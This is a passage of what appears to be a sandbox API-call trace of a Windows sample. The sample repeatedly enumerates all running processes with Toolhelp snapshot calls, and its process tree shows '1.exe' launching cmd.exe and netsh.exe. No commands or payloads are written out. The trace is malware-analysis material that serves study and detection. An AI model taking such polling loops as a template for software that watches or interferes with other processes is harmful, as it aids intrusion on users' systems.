th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0150.585] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0150.585] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.586] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.587] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0150.587] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.588] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.588] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.589] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.590] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.590] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.591] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.592] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.592] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.593] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.593] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.594] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.595] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.595] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0150.596] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.596] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0150.598] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0150.598] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0150.599] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0150.600] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.600] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0150.601] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0150.601] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0150.602] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0150.603] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0150.603] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0150.604] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0150.604] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0150.605] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0150.606] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0150.606] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0150.607] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.608] Process32NextW (in: hSnapshot=0x2f4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0150.608] CloseHandle (hObject=0x2f4) returned 1 [0150.608] Sleep (dwMilliseconds=0x1f4) [0151.300] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2fc [0151.304] Process32FirstW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.304] GetLastError () returned 0x12 [0151.305] SetLastError (dwErrCode=0x12) [0151.305] GetLastError () returned 0x12 [0151.305] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.305] GetLastError () returned 0x12 [0151.305] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.306] GetLastError () returned 0x12 [0151.306] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.306] GetLastError () returned 0x12 [0151.307] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.307] GetLastError () returned 0x12 [0151.307] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.308] GetLastError () returned 0x12 [0151.308] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.308] GetLastError () returned 0x12 [0151.308] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.309] GetLastError () returned 0x12 [0151.309] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.310] GetLastError () returned 0x12 [0151.310] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0151.310] GetLastError () returned 0x12 [0151.310] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0151.311] GetLastError () returned 0x12 [0151.311] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.312] GetLastError () returned 0x12 [0151.312] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.312] GetLastError () returned 0x12 [0151.312] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.313] GetLastError () returned 0x12 [0151.313] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.314] GetLastError () returned 0x12 [0151.314] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.314] GetLastError () returned 0x12 [0151.314] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.315] GetLastError () returned 0x12 [0151.315] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.316] GetLastError () returned 0x12 [0151.316] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.316] GetLastError () returned 0x12 [0151.316] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.317] GetLastError () returned 0x12 [0151.317] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.317] GetLastError () returned 0x12 [0151.318] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.318] GetLastError () returned 0x12 [0151.318] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.319] GetLastError () returned 0x12 [0151.319] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.319] GetLastError () returned 0x12 [0151.319] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.320] GetLastError () returned 0x12 [0151.320] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.321] GetLastError () returned 0x12 [0151.321] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.321] GetLastError () returned 0x12 [0151.321] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0151.322] GetLastError () returned 0x12 [0151.322] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.323] GetLastError () returned 0x12 [0151.323] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0151.323] GetLastError () returned 0x12 [0151.323] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0151.324] GetLastError () returned 0x12 [0151.324] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0151.324] GetLastError () returned 0x12 [0151.325] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0151.325] GetLastError () returned 0x12 [0151.325] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.326] GetLastError () returned 0x12 [0151.326] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0151.326] GetLastError () returned 0x12 [0151.326] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0151.327] GetLastError () returned 0x12 [0151.327] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0151.328] GetLastError () returned 0x12 [0151.328] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0151.328] GetLastError () returned 0x12 [0151.328] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: 